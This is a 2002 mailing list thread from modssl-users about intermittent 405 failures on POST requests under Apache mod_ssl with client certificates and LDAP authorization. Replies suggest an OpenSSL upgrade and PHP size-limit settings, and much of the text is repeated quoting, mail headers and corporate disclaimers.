> > >I've got an self-built Apache on a RedHat 7.3 Linux box with
> > >Apache/2.0.43,
> > >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> > >
> > >Every so often a PHP page is called with a POST request to
> > >send data to the
> > >server. The whole server area is protected via the following
> > >settings in
> > >ssl.conf:
> > >
> > >
> > >        Options Indexes FollowSymLinks ExecCGI
> > >        DirectoryIndex index.php index.cgi
> > >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> > >StrictRequire StdEnvVars OptRenegotiate
> > >
> > >        SSLRequireSSL
> > >        SSLVerifyClient require
> > >        SSLVerifyDepth  4
> > >        SSLRequire     ( \
> > >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> > >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> > >
> > >        AuthzLDAPEngine                 on
> > >        AuthzLDAPAuthoritative          on
> > >        AuthzLDAPServer                 localhost:389
> > >        AuthzLDAPBindDN
> > "cn=manager,dc=mydomain,dc=com"
> > >        AuthzLDAPBindPassword           "terriblysecret"
> > >        AuthzLDAPUseCertificate         on
> > >        AuthzLDAPSetAuthorization       on
> > >        AuthzLDAPUseSerial              on
> > >        AuthzLDAPMapBase
> > >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> > >        AuthzLDAPMapScope               subtree
> > >        AuthzLDAPLogLevel               warn
> > >        AuthzLDAPCacheConnection        off
> > >        AuthzLDAPCacheSize              0
> > >        AuthName                        AuthzLDAP
> > >        AuthType                        Basic
> > >
> > >
> > >and with the following require in .htaccess of the same directory:
> > >
> > >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> > >
> > >GET operations always work perfectly (BTW almost all resources
> > >are .PHP).
> > >Once in a while a POST method is attempted which then
> > >sometimes fails (not
> > >always). When it has failed, subsequent GET methods on
> > >different pages do
> > >not work either. After a certain time which always differs,
> > >the GET will work
> > >and the following POST also.
> > >
> > >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> > >`sem' thinking
> > >it had something to do with it, but to no avail. The value of
> > >SSLSessionCacheTimeout
> > >doesn't seem to matter either.
> > >
> > >At the time of the failure, the logs have this in them:
> > >
> > >error_log:
> > >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> > >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> > >resuming normal operations
> > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > >in conjunction with POST method not supported!
> > >	hint: try SSLOptions +OptRenegotiate
> > >
> > >access_log:
> > >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> > >/ca/ra/upd.php HTTP/1.1" 405 312
> > >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> > >/ca/ra/req.php HTTP/1.1" 403 292
> > >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> > >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> > >
> > >ssl_request_log:
> > >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> > >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> > >
> > >The clients are a mixture of Mozilla 1.2 and Internet
> > Explorer 6.0 all
> > >with a client cert issued by my CA. The issue affects both
> > >clients (Netscape
> > >4.5 shows the same)
> > >
> > >Can someone help me resolve this, please ?
> > >
> > >Thank you very much.
> > >Regards,
> > >	-JP
> > >
> > >_____________________________________________________________
> > _________
> > >Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> -
>
> NOTICE: The information contained in this email and any attachments is
> confidential and may be legally privileged. If you are not the
> intended recipient you are hereby notified that you must not use,
> disclose, distribute, copy, print or rely on this email's content. If
> you are not the intended recipient, please notify the sender
> immediately and then delete the email and any attachments from your
> system.
>
> RNIB has made strenuous efforts to ensure that emails and any
> attachments generated by its staff are free from viruses. However, it
> cannot accept any responsibility for any viruses which are
> transmitted. We therefore recommend you scan all attachments.
>
> Please note that the statements and views expressed in this email
> and any attachments are those of the author and do not necessarily
> represent those of RNIB.
>
> RNIB Registered Charity Number: 226227
>
> Website: http://www.rnib.org.uk
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 17:51:04 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 586892AA084; Tue, 17 Dec 2002 17:51:04 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from GATE2.retail-sc.com (gate2.retail-sc.com [195.127.175.210])
	by master.modssl.org (Postfix) with ESMTP id 01F992AA078
	for ; Tue, 17 Dec 2002 17:51:02 +0100 (CET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id RAA28837
	for ; Tue, 17 Dec 2002 17:49:38 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id RAA19211
	for ; Tue, 17 Dec 2002 17:49:37 +0100
Date: Tue, 17 Dec 2002 17:49:37 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A626@SOMEXEVS001.ex.ordersx.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've upgraded to 0.9.6h and recompiled Apache. No change. Still get the
hint in the error_log. Any other ideas ?

	-JP


On Tue, 17 Dec 2002, Boyle Owen wrote:

> Your openSSL libs are a bit old - there have been many important code
> updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> fixed race condition bugs that were causing intermittent failures. Try
> an upgrade first, I would advise...
>
> Rgds,
>
> Owen Boyle
>
> >-----Original Message-----
> >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> >Sent: Dienstag, 17. Dezember 2002 16:07
> >To: modssl-users@modssl.org
> >Subject: POST with mod_ssl intermittently fails with a 405
> >
> >
> >Hello,
> >
> >I've got an self-built Apache on a RedHat 7.3 Linux box with
> >Apache/2.0.43,
> >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> >
> >Every so often a PHP page is called with a POST request to
> >send data to the
> >server. The whole server area is protected via the following
> >settings in
> >ssl.conf:
> >
> >
> >        Options Indexes FollowSymLinks ExecCGI
> >        DirectoryIndex index.php index.cgi
> >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> >StrictRequire StdEnvVars OptRenegotiate
> >
> >        SSLRequireSSL
> >        SSLVerifyClient require
> >        SSLVerifyDepth  4
> >        SSLRequire     ( \
> >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> >
> >        AuthzLDAPEngine                 on
> >        AuthzLDAPAuthoritative          on
> >        AuthzLDAPServer                 localhost:389
> >        AuthzLDAPBindDN                 "cn=manager,dc=mydomain,dc=com"
> >        AuthzLDAPBindPassword           "terriblysecret"
> >        AuthzLDAPUseCertificate         on
> >        AuthzLDAPSetAuthorization       on
> >        AuthzLDAPUseSerial              on
> >        AuthzLDAPMapBase
> >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> >        AuthzLDAPMapScope               subtree
> >        AuthzLDAPLogLevel               warn
> >        AuthzLDAPCacheConnection        off
> >        AuthzLDAPCacheSize              0
> >        AuthName                        AuthzLDAP
> >        AuthType                        Basic
> >
> >
> >and with the following require in .htaccess of the same directory:
> >
> >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> >
> >GET operations always work perfectly (BTW almost all resources
> >are .PHP).
> >Once in a while a POST method is attempted which then
> >sometimes fails (not
> >always). When it has failed, subsequent GET methods on
> >different pages do
> >not work either. After a certain time which always differs,
> >the GET will work
> >and the following POST also.
> >
> >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> >`sem' thinking
> >it had something to do with it, but to no avail. The value of
> >SSLSessionCacheTimeout
> >doesn't seem to matter either.
> >
> >At the time of the failure, the logs have this in them:
> >
> >error_log:
> >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> >resuming normal operations
> >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> >in conjunction with POST method not supported!
> >	hint: try SSLOptions +OptRenegotiate
> >
> >access_log:
> >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> >/ca/ra/upd.php HTTP/1.1" 405 312
> >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> >/ca/ra/req.php HTTP/1.1" 403 292
> >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> >
> >ssl_request_log:
> >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> >
> >The clients are a mixture of Mozilla 1.2 and Internet Explorer 6.0 all
> >with a client cert issued by my CA. The issue affects both
> >clients (Netscape
> >4.5 shows the same)
> >
> >Can someone help me resolve this, please ?
> >
> >Thank you very much.
> >Regards,
> >	-JP
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 18:13:12 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EE7FD2AA085; Tue, 17 Dec 2002 18:13:11 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 5B1D52AA083
	for ; Tue, 17 Dec 2002 18:13:06 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gBHHEAd29570
	for ; Tue, 17 Dec 2002 17:14:30 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 17 Dec 2002 17:12:30 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F24CA@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Tue, 17 Dec 2002 17:12:29 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry to be slow on the uptake. How big is your POST? I had an issue with
memory_limit, post_max_size and upload_max_filesize (all in /etc/php.ini).
If your POST is bigger than the limits within php, the script may give up.
This could be the cause of what you are seeing.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be a
telephone in every Town in America" - Alexander Graham Bell (my paraphrase)


> -----Original Message-----
> From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> Sent: 17 December 2002 16:50
> To: modssl-users@modssl.org
> Subject: RE: POST with mod_ssl intermittently fails with a 405
> 
> 
> I've upgraded to 0.9.6h and recompiled Apache. No change. 
> Still get the
> hint in the error_log. Any other ideas ?
> 
> 	-JP
> 
> 
> On Tue, 17 Dec 2002, Boyle Owen wrote:
> 
> > Your openSSL libs are a bit old - there have been many 
> important code
> > updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> > fixed race condition bugs that were causing intermittent 
> failures. Try
> > an upgrade first, I would advise...
> >
> > Rgds,
> >
> > Owen Boyle
> >
> > >-----Original Message-----
> > >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > >Sent: Dienstag, 17. Dezember 2002 16:07
> > >To: modssl-users@modssl.org
> > >Subject: POST with mod_ssl intermittently fails with a 405
> > >
> > >
> > >Hello,
> > >
> > >I've got an self-built Apache on a RedHat 7.3 Linux box with
> > >Apache/2.0.43,
> > >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> > >
> > >Every so often a PHP page is called with a POST request to
> > >send data to the
> > >server. The whole server area is protected via the following
> > >settings in
> > >ssl.conf:
> > >
> > >
> > >        Options Indexes FollowSymLinks ExecCGI
> > >        DirectoryIndex index.php index.cgi
> > >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> > >StrictRequire StdEnvVars OptRenegotiate
> > >
> > >        SSLRequireSSL
> > >        SSLVerifyClient require
> > >        SSLVerifyDepth  4
> > >        SSLRequire     ( \
> > >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> > >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> > >
> > >        AuthzLDAPEngine                 on
> > >        AuthzLDAPAuthoritative          on
> > >        AuthzLDAPServer                 localhost:389
> > >        AuthzLDAPBindDN                 
> "cn=manager,dc=mydomain,dc=com"
> > >        AuthzLDAPBindPassword           "terriblysecret"
> > >        AuthzLDAPUseCertificate         on
> > >        AuthzLDAPSetAuthorization       on
> > >        AuthzLDAPUseSerial              on
> > >        AuthzLDAPMapBase
> > >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> > >        AuthzLDAPMapScope               subtree
> > >        AuthzLDAPLogLevel               warn
> > >        AuthzLDAPCacheConnection        off
> > >        AuthzLDAPCacheSize              0
> > >        AuthName                        AuthzLDAP
> > >        AuthType                        Basic
> > >
> > >
> > >and with the following require in .htaccess of the same directory:
> > >
> > >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> > >
> > >GET operations always work perfectly (BTW almost all resources
> > >are .PHP).
> > >Once in a while a POST method is attempted which then
> > >sometimes fails (not
> > >always). When it has failed, subsequent GET methods on
> > >different pages do
> > >not work either. After a certain time which always differs,
> > >the GET will work
> > >and the following POST also.
> > >
> > >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> > >`sem' thinking
> > >it had something to do with it, but to no avail. The value of
> > >SSLSessionCacheTimeout
> > >doesn't seem to matter either.
> > >
> > >At the time of the failure, the logs have this in them:
> > >
> > >error_log:
> > >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> > >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> > >resuming normal operations
> > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > >in conjunction with POST method not supported!
> > >	hint: try SSLOptions +OptRenegotiate
> > >
> > >access_log:
> > >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> > >/ca/ra/upd.php HTTP/1.1" 405 312
> > >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> > >/ca/ra/req.php HTTP/1.1" 403 292
> > >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> > >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> > >
> > >ssl_request_log:
> > >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> > >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> > >
> > >The clients are a mixture of Mozilla 1.2 and Internet 
> Explorer 6.0 all
> > >with a client cert issued by my CA. The issue affects both
> > >clients (Netscape
> > >4.5 shows the same)
> > >
> > >Can someone help me resolve this, please ?
> > >
> > >Thank you very much.
> > >Regards,
> > >	-JP
> > >
> > 
> >_____________________________________________________________
> _________
> > >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 18:14:19 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8581E2AA084; Tue, 17 Dec 2002 18:14:19 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 432102AA078
	for ; Tue, 17 Dec 2002 18:14:16 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gBHHFbd29624
	for ; Tue, 17 Dec 2002 17:15:40 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 17 Dec 2002 17:13:57 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F24CB@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Tue, 17 Dec 2002 17:13:57 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Oops. I meant to say that you should have "memory_limit" twice
"upload_max_filesize". I've had problem when they've both been the same.

John

> -----Original Message-----
> From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> Sent: 17 December 2002 16:50
> To: modssl-users@modssl.org
> Subject: RE: POST with mod_ssl intermittently fails with a 405
> 
> 
> I've upgraded to 0.9.6h and recompiled Apache. No change. 
> Still get the
> hint in the error_log. Any other ideas ?
> 
> 	-JP
> 
> 
> On Tue, 17 Dec 2002, Boyle Owen wrote:
> 
> > Your openSSL libs are a bit old - there have been many 
> important code
> > updates since 0.9.6b. In particular, the most recent update (0.9.6h)
> > fixed race condition bugs that were causing intermittent 
> failures. Try
> > an upgrade first, I would advise...
> >
> > Rgds,
> >
> > Owen Boyle
> >
> > >-----Original Message-----
> > >From: Jan-Piet Mens [mailto:jpm@Retail-sc.com]
> > >Sent: Dienstag, 17. Dezember 2002 16:07
> > >To: modssl-users@modssl.org
> > >Subject: POST with mod_ssl intermittently fails with a 405
> > >
> > >
> > >Hello,
> > >
> > >I've got an self-built Apache on a RedHat 7.3 Linux box with
> > >Apache/2.0.43,
> > >mod_ssl/2.0.43,  OpenSSL/0.9.6b,  PHP/4.2.3 and mod_authzldap 0.22
> > >
> > >Every so often a PHP page is called with a POST request to
> > >send data to the
> > >server. The whole server area is protected via the following
> > >settings in
> > >ssl.conf:
> > >
> > >
> > >        Options Indexes FollowSymLinks ExecCGI
> > >        DirectoryIndex index.php index.cgi
> > >        SSLOptions FakeBasicAuth ExportCertData CompatEnvVars
> > >StrictRequire StdEnvVars OptRenegotiate
> > >
> > >        SSLRequireSSL
> > >        SSLVerifyClient require
> > >        SSLVerifyDepth  4
> > >        SSLRequire     ( \
> > >                %{SSL_CIPHER} !~ m/^(EXP|NULL)/ and \
> > >                %{SSL_CLIENT_I_DN_CN} eq "my CA" )
> > >
> > >        AuthzLDAPEngine                 on
> > >        AuthzLDAPAuthoritative          on
> > >        AuthzLDAPServer                 localhost:389
> > >        AuthzLDAPBindDN                 
> "cn=manager,dc=mydomain,dc=com"
> > >        AuthzLDAPBindPassword           "terriblysecret"
> > >        AuthzLDAPUseCertificate         on
> > >        AuthzLDAPSetAuthorization       on
> > >        AuthzLDAPUseSerial              on
> > >        AuthzLDAPMapBase
> > >ou=AuthzLDAPCertmap,dc=mydomain,dc=com
> > >        AuthzLDAPMapScope               subtree
> > >        AuthzLDAPLogLevel               warn
> > >        AuthzLDAPCacheConnection        off
> > >        AuthzLDAPCacheSize              0
> > >        AuthName                        AuthzLDAP
> > >        AuthType                        Basic
> > >
> > >
> > >and with the following require in .htaccess of the same directory:
> > >
> > >	require user "CN=Jan-Piet Mens/Email=jpm@mydomain.com"
> > >
> > >GET operations always work perfectly (BTW almost all resources
> > >are .PHP).
> > >Once in a while a POST method is attempted which then
> > >sometimes fails (not
> > >always). When it has failed, subsequent GET methods on
> > >different pages do
> > >not work either. After a certain time which always differs,
> > >the GET will work
> > >and the following POST also.
> > >
> > >I've tried changing SSLSessionCache to `shm' and SSLMutex to
> > >`sem' thinking
> > >it had something to do with it, but to no avail. The value of
> > >SSLSessionCacheTimeout
> > >doesn't seem to matter either.
> > >
> > >At the time of the failure, the logs have this in them:
> > >
> > >error_log:
> > >	[Tue Dec 17 15:38:21 2002] [notice] Apache/2.0.43
> > >(Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b PHP/4.2.3 configured --
> > >resuming normal operations
> > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > >in conjunction with POST method not supported!
> > >	hint: try SSLOptions +OptRenegotiate
> > >
> > >access_log:
> > >	10.0.0.1 - - [17/Dec/2002:15:48:08 +0100] "POST
> > >/ca/ra/upd.php HTTP/1.1" 405 312
> > >	10.0.0.1 - - [17/Dec/2002:15:48:28 +0100] "GET
> > >/ca/ra/req.php HTTP/1.1" 403 292
> > >	10.0.0.1 - CN=Jan-Piet Mens/Email=jpm@mydomain.com
> > >[17/Dec/2002:15:49:21 +0100] "GET /ca/ra/req.php HTTP/1.1" 200 4936
> > >
> > >ssl_request_log:
> > >	[17/Dec/2002:15:48:08 +0100] 10.0.0.1 TLSv1 RC4-MD5
> > >"POST /ca/ra/upd.php HTTP/1.1" 312 s_dn="-",  issuer="-"
> > >
> > >The clients are a mixture of Mozilla 1.2 and Internet 
> Explorer 6.0 all
> > >with a client cert issued by my CA. The issue affects both
> > >clients (Netscape
> > >4.5 shows the same)
> > >
> > >Can someone help me resolve this, please ?
> > >
> > >Thank you very much.
> > >Regards,
> > >	-JP
> > >
> > 
> >_____________________________________________________________
> _________
> > >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >User Support Mailing List                      
> modssl-users@modssl.org
> > >Automated List Manager                            
> majordomo@modssl.org
> > >
> >
> > This message is for the named person's use only. It may contain
> > confidential, proprietary or legally privileged information. No
> > confidentiality or privilege is waived or lost by any 
> mistransmission.
> > If you receive this message in error, please notify the 
> sender urgently
> > and then immediately delete the message and any copies of 
> it from your
> > system. Please also immediately destroy any hardcopies of 
> the message.
> > You must not, directly or indirectly, use, disclose, 
> distribute, print,
> > or copy any part of this message if you are not the 
> intended recipient.
> > The sender's company reserves the right to monitor all e-mail
> > communications through their networks. Any views expressed in this
> > message are those of the individual sender, except where the message
> > states otherwise and the sender is authorised to state them 
> to be the
> > views of the sender's company.
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                      
> modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 18:40:08 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0F78F2AA084; Tue, 17 Dec 2002 18:40:08 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from GATE2.retail-sc.com (ns.rscweb.net [195.127.175.210])
	by master.modssl.org (Postfix) with ESMTP id 798D02AA078
	for ; Tue, 17 Dec 2002 18:40:00 +0100 (CET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id SAA31159
	for ; Tue, 17 Dec 2002 18:39:04 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id SAA21546
	for ; Tue, 17 Dec 2002 18:39:03 +0100
Date: Tue, 17 Dec 2002 18:39:03 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F24CB@pborolocal.rnib.org.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
